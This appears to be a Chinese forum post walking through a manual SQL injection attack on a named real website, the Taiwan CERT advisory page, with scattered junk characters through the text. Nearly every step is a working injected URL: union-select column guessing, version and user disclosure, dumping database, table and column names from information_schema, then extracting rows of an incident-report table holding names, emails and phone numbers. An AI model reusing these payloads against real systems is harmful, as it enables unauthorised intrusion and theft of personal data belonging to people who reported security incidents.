1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询' z' X) [5 W$ x/ a! p( q2 C+ p
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
2 R1 H G" F# Whttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3 z0 u. ]0 O# ~3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
3 }4 Y! }' L+ a( E5 V1 E$ C# e( C数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
1 W% }8 L4 N, A) |& A' w: S1 ~8 j' W4.判断有没有写权限
6 z' Z8 J+ y8 H5 D. }4 F8 Mhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限0 X& {$ K0 Z# n: o
没办法,手动猜表啦9 M9 b& e. w/ h8 W( C
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1' o- K0 Q$ p. N, B2 {8 p
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
$ E3 o5 x; D" @ o* }% lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
9 k8 I; S# w+ b* d成功查出所有数据库,国外的黑客就是不一般。数据库如下:0 J$ Z _$ u( k* R% K2 ~; h
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb2 g3 D& L* I; I2 I% W
6.爆表,爆的是twcert库
# E; T+ H: E1 p9 \0 a' Phttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
; V1 q" Z/ V/ U' L6 g爆出如下表& n! _0 ?. `0 X. p) a! d/ m9 d
downloadfile,irsys,newsdata,secrpt,secrpt_big5 t& A# K& v7 h' L0 H+ R
7.爆列名,这次爆的是irsys表* e" p/ Z' L% C6 ?# w h9 Z8 M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--6 W. i# C0 c8 w6 o% P
爆出如下列
/ R+ Q9 B8 z1 |/ }* Sir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
4 h: O- `9 ^1 c/ v( C N* M% j8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。3 r/ q3 }$ z, e! K/ @4 y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--. T6 ]' P0 s$ ]# }" W1 H% X% @
返回是3,说明每个列里有3个地段
5 g* W! W) q: O7 K$ O: O# N9.爆字段内容/ m' m8 v. W" a8 l" S
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--9 v% ~# W: Z! d. o$ o/ n! l1 `
爆出name列的第一个字段的内容. k0 `$ k' Q! ~% ^2 s
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--/ d9 F+ z$ U: x" ]/ {) _
爆出name列的第二个字段的内容 |